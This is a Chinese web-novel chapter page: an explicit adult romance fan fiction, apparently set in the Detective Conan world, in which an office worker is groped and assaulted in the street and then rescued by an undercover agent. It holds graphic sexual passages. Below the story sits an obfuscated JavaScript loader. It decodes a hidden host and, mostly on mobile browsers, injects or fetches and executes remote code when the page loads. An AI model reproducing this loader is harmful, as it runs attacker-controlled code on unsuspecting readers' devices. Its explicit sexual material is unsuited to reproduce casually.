烽火小说网

阅读记录  |   用户书架
上一章
目录 | 设置
下一章

英雄救美(1 / 1)

加入书签 | 推荐本书 | 问题反馈 |

英雄救美



啊,我没救了。花田晴子宽面条泪额头抵着墙一副自闭的样子。我竟然在医院那么神圣的地方干这种事。是的,爽完后的晴子理智回笼了。

回到家都是浑浑噩噩的,洗完澡清醒过来的晴子恨不得穿越回去早上把自己从医院拉出去,再,再怎么说,也不能在医院啊!脸红。

虽然说,真的很舒服就是。晴子有点回味地想着,不愧是医生,技术真的好好哦,长得也很帅……嗯不行不行,她甩甩头,要是再想下去她又想要了。

可恶,怎么她才这个年龄就如狼似虎吗?晴子鼓着脸颊有点恨自己不争气的身体,但又忍不住想到今天被手指进入的快感,她将手探进内裤,不知道如果是真roubang进去会不会更爽……和那些里番动画一样?

(是的,她对真人小电影无感,太丑了)

嘶……疼。碰到破皮的阴蒂,晴子闷恹恹地拿出手指,看来最近不能玩了。

周一。为了庆祝新游戏畅销,策划组决定下班后聚餐。领头同事邀请组长朝日奈枣时,他本来是想去的,但是很可惜公司领导层下班后要开大会。

他很清楚自己手下几乎都是些皮猴子,特别男人喝起酒来就没几个不疯的,只好敲打一下组员:庆祝可以,别喝多了,明天还要上班,出错了我可不会留情。

又直白地对几个女组员提醒道:晚上不要太晚回家,不用参加什么第二轮聚会,自己注意安全。特地看了下花田晴子,走神的样子也不知道在想什么。

啊组长说得我们要干什么坏事一样。知道啦,朝日奈mama。男组员开起玩笑。

额头冒十字,朝日奈枣没好气地说:现在还是上班时间,快点回到工作岗位上去。

花田留下,上周提交的策划有要改动的。

是。晴子有点忐忑地靠近枣,看向电脑上她提交的策划稿被做了颜色的标注,她很怕自己的工作出错。

不用紧张,我觉得这里的剧情你可以考虑修改下……简短地沟通完工作的事,枣侧首看着晴子认真地在做笔记的样子。两人的距离很近,他可以闻到晴子身上清新的柠檬味。晴子很喜欢这类酸酸的水果,这是她白的原因吗?枣分神想着。

她没有涂睫毛膏,但睫毛很长,当她扑闪着大眼睛专注地看着人时,会有种自己是唯一的错觉。

枣很喜欢她认真的性格,外貌……也很喜欢,想到这,他又提醒道:今天晚上聚会的地点离你家有点远。你记得早点脱身。有什么事情可以打我电话。

好。晴子微红着脸,她心里有个猜测,或许组长对她并不是没意思的,组长,这周末你有空吗?

就是之前手帕的事,我想请你吃饭。

又来了。这样子用水汪汪的眼睛期待地欣喜地看着他。枣哑声道:有的,就周六吧。

他有时候会想,花田晴子是不是故意的。明明平时都尽量躲着他,但是一旦躲不开必须面对时,又会用她柔美的女性魅力诱惑人。不对,枣握拳敲了下自己额头,这听起来就是男人为自己开脱的辩辞,我也是个混蛋啊。



聚会结束的时间比晴子预估的还要晚,前辈都喝嗨了拦着不让人走,如果不是枣晚上打电话给领头的,还不知道持续到几点。破费打的回到家附近时都快11点了。喝了点酒又酒量一般的晴子有点晕地往公寓走。

老小区的路灯并不好,昏黄灰暗,晴子没有留意到角落里藏着的人,直到从背后被一把拽过抱住。

没想到这个点还有这么正的妞啊,小姐在找人玩吗?男人yin邪的声音吓醒了晴子,他的手粗暴地挤着晴子丰满的胸脯。噢噢,真不错啊这感觉。

救命!救命!晴子惊恐地直接大叫,可是偏僻的老小区没多少人,她拼命地想挣开歹徒,尚能自由活动的双手摸到男人的小拇指后用力往后掰,趁着男人吃痛松手时她转身肘击逃跑,可是喝了酒的她力气不够大,男人并没有晕眩很久就赶了上来一把揪住她长发。

啊!摔倒在地的晴子痛呼出声,害怕的泪水夺眶而出,男人愤怒的表情很是吓人:妈的,你再跑啊。

可怕的时光没有持续太久,刚刚还很凶狠的歹徒突然被人一招打晕制服,诸伏景光将男人双手捆住绑在路灯后匿名报了警,小心地靠近花田晴子:小姐,没事了。你还好吗?

衣衫凌乱的晴子裸露的肌肤是rou眼可见的擦伤,平时活泼灵动的双眼现在满是恐惧的泪水,无声地流着。没事了?有些不确定的虚弱的声音。

没事了。景光坚定的回答。他弯下身伸出手:还可以站起来吗?我送你回去吧。

他在附近刚结束一个任务,听到女子的求救时正义感让他无法视而不见,哪怕他已经适应苏格兰的身份很久。

痛!尝试站起的晴子疼的脸色更白了,她的脚刚刚不小心崴到,感觉好像还摔到骨头了。

……失礼了景光拿过晴子掉在一旁的手袋,靠近搀扶着她,可另一只脚刚刚也摔过,感觉还没缓过来,即便晴子把重心压在男人身上,走一步路一动就抽抽地痛。

从小到大没吃过这种苦头的她忍不住哭喊出声疼,委屈害怕无助,她甚至没有想过旁边的男人是个彻底的陌生人,只记住他救了自己,在他面前无遮掩地发泄着自己的脆弱。

景光心里暗叹,他对女人的泪水总是没办法的,尤其在这种时刻。他公主抱起晴子,柔声道:我先送你回家好吗?伤口需要处理。他调查过这附近,最近的诊所早就关门了,没有夜间营业。

嗯。晴子靠在他胸膛上,因为哭泣身体还在一抽一抽,和小孩子一样。

回到家里,晴子找回了安全感,她紧紧抱住抱枕,想搬家的愿望此刻无比强烈。

景光进了屋子,条件反射性地观察分析起来,窗帘全部都是拉起的,屋主是个害怕窥探保护自己的人?但是房子的装修摆饰很温馨,绿植也养得很健康,从这些看应该是热爱生活的,如果这样,应该不会让窗帘紧闭。

矛盾的人。景光打住念头,这应该不是组织的陷阱试探。他隐隐有察觉组织似乎在怀疑他,但这么低级的方式,不像琴酒的风格。

何况,一个正常男人,因为美色而见义勇为登堂入室,也是很合理的发展不是吗?

景光拿好医药箱蹲在女人身前,小心地给她做应急处理,柔若无骨的小脚被男人大手捧着,本该是个旖旎画面,但红肿的脚踝破坏了和谐,看起来应该没有骨折。只是这几天还是要好好休养。

景光抬眸,对上晴子信任依赖的眼神。不可否认,她确实长得很好看,但是时间不对,人也不对。

他避开晴子的眼神,尽量保持着距离给她处理完手上的伤口,然后礼貌地道别。

晴子拉住景光的手,至少,拜托请告诉我名字。男人不愿意告诉她联系方式,也不接受她的金钱答谢,彻底的见义勇为不图回报。

景光叹了口气,他转回身面对晴子,光(Hikaru)。

那么,真的很抱歉需要离开了。请花田小姐小心照顾自己。如果可以的话让朋友来帮忙吧。景光本想这么建议,但是最后还是没有说出口。萍水相逢,交谈不必过深。

不愿意说全名啊……晴子失落地想着,这时的她甚至不知道对方给的是假名。

疲惫又惊心动魄的一晚,晴子靠在沙发上放空自己,明天早上再请假吧。没有看手机的她不知道因为一直没得到回应而担心的枣已经在来找她的路上了。



function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2tqaGRiaGpzYmprZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间